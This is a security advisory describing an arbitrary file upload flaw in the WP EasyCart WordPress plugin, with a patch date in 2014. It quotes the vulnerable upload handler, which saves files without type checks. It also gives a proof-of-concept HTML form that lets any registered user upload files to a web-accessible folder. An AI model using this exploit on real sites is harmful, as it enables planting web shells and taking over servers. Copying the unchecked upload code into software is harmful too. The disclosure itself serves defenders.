Any registered user can upload any file.
File: wp-easycart\inc\amfphp\administration\banneruploaderscript.php
$date = $_POST['datemd5'];
$usersqlquery = sprintf("SELECT ec_user.*, ec_role.admin_access FROM ec_user LEFT JOIN ec_role ON (ec_user.user_level = ec_role.role_label) WHERE ec_user.password = '%s' AND (ec_user.user_level = 'admin' OR ec_role.admin_access = 1)", mysql_real_escape_string($requestID));
$userresult = mysql_query($usersqlquery);
$users = mysql_fetch_assoc($userresult);
if ($users || is_user_logged_in()) {
$filename = $_FILES['Filedata']['name'];
$filetmpname = $_FILES['Filedata']['tmp_name'];
$fileType = $_FILES["Filedata"]["type"];
$fileSizeMB = ($_FILES["Filedata"]["size"] / 1024 / 1000);
$explodedfilename = pathinfo($filename);
$nameoffile = $explodedfilename['filename'];
$fileextension = $explodedfilename['extension'];
move_uploaded_file($_FILES['Filedata']['tmp_name'], "../../../products/banners/".$nameoffile."_".$date.".".$fileextension);
}
Proof of Concept
Login as regular user (created using wp-login.php?action=register):
<form action="http://wordpress-install/wp-content/plugins/wp-easycart/inc/amfphp/administration/banneruploaderscript.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="datemd5" value="1">
<input type="file" name="Filedata">
<input value="Upload!" type="submit">
</form>
File will be visible:
http://wordpress-install/wp-content/plugins/wp-easycart/products/banners/%filename%_1.%fileextension%
Timeline
- 29-10-2014: Discovered
- 16-11-2014: Vendor notified
- 17-11-2014: Version 3.0.9 released, issue resolved